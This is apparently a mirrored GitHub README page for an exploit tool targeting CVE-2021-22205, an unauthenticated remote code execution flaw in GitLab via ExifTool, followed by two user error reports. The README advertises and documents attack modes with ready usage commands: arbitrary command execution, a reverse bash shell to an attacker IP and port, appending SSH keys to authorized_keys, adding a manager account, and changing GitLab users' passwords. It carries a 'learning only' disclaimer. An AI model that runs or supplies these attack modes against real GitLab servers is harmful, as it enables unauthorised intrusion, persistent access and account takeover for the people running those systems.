Coder Social home page Coder Social logo

cve-2021-22205's Introduction

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

Features

  • Gitlab version detection through the hash in Webpack manifest.json

  • Automatical out-of-band interactions with DNSLog & PostBin RequestBin

  • Support Reverse Bash Shell / Append SSH Key to authorized_keys

  • Support ENTER to modify and restore gitlab user password

Usage

๐Ÿš โ€บโ€บโ€บ python CVE-2021-22205.py

      โ–‘โ–‘โ–‘โ–‘โ–โ–โ–‘โ–‘โ–‘  CVE-2021-22205
 โ–  โ–‘โ–‘โ–‘โ–‘โ–‘โ–„โ–ˆโ–ˆโ–„โ–„  GitLab CE/EE Unauthenticated RCE using ExifTool
  โ–€โ–€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–€โ–‘โ–‘  Affecting all versions starting from 11.9
  โ–‘โ–‘โ–โ–โ–‘โ–‘โ–โ–โ–‘โ–‘  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 โ–’โ–’โ–’โ–โ–โ–’โ–’โ–โ–โ–’  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via requestbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
  • The site_url parameter format: http[s]://<domain|ip>[:port]/, such as: https://example.com:9000/
  • Methods(rce2,add) marked by * is unstable, may not work :(
  • You can modify the script content according to the actual environment

Screenshot

Detect:

image-20220116233646585

RCE(Echo via RequestBin OOB):

image-20220116234003576

Reverse Bash Shell:

image-20211111131442470

Append SSH Key to authorized_keys:

image-20211111133555010

Gitlab user password modification and restoration:

image-20211111132115090

Reference

cve-2021-22205's People

Contributors

inspiringz avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar

Forkers

1f3lse ykankaya 5l1v3r1 bravery9 crackercat uuusmile suzuhaotoha afwu b1gd0g agelovito blankm1 nanaao blacklotus404 s1xhcl douglas88 shea-des expzhizhuo bosen john-tidwell thecryinggame 74123691475963u startagain2016 ofalwl 9ak47er 9uoer securepo smr8888 shincehor sec-fork tux-macg1v redbready pinklinux im-hanzou ronin-dojo 0xsojalsec kondeck2020 zerokiddie vieux448

cve-2021-22205's Issues

run error

Traceback (most recent call last):
File "CVE-2021-22205.py", line 1075, in
ip=console.ip, port=console.port, user=console.user, passwd=console.passwd)
File "CVE-2021-22205.py", line 219, in step2
self.oob_init()
File "CVE-2021-22205.py", line 125, in oob_init
self.reqb.create_bin()
File "CVE-2021-22205.py", line 95, in create_bin
self.bin_id = json.loads(resp.text)['name']
File "/usr/lib64/python3.6/json/init.py", line 354, in loads
return _default_decoder.decode(s)
File "/usr/lib64/python3.6/json/decoder.py", line 339, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/lib64/python3.6/json/decoder.py", line 357, in raw_decode
raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

when i run its not workig

its show me when i run command python3 CVE-2021-22205.py -u http://target.com -m detect
its show
File "/home/mrkc/Desktop/myexperience/CVE-2021-22205-main/CVE-2021-22205.py", line 1074, in
grce.step2(method=console.method, cmd=console.cmd,
File "/home/mrkc/Desktop/myexperience/CVE-2021-22205-main/CVE-2021-22205.py", line 176, in step2
self.oob_init()
File "/home/mrkc/Desktop/myexperience/CVE-2021-22205-main/CVE-2021-22205.py", line 125, in oob_init
self.reqb.create_bin()
File "/home/mrkc/Desktop/myexperience/CVE-2021-22205-main/CVE-2021-22205.py", line 95, in create_bin
self.bin_id = json.loads(resp.text)['name']
File "/usr/local/lib/python3.10/json/init.py", line 346, in loads
return _default_decoder.decode(s)
File "/usr/local/lib/python3.10/json/decoder.py", line 337, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/local/lib/python3.10/json/decoder.py", line 355, in raw_decode
raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.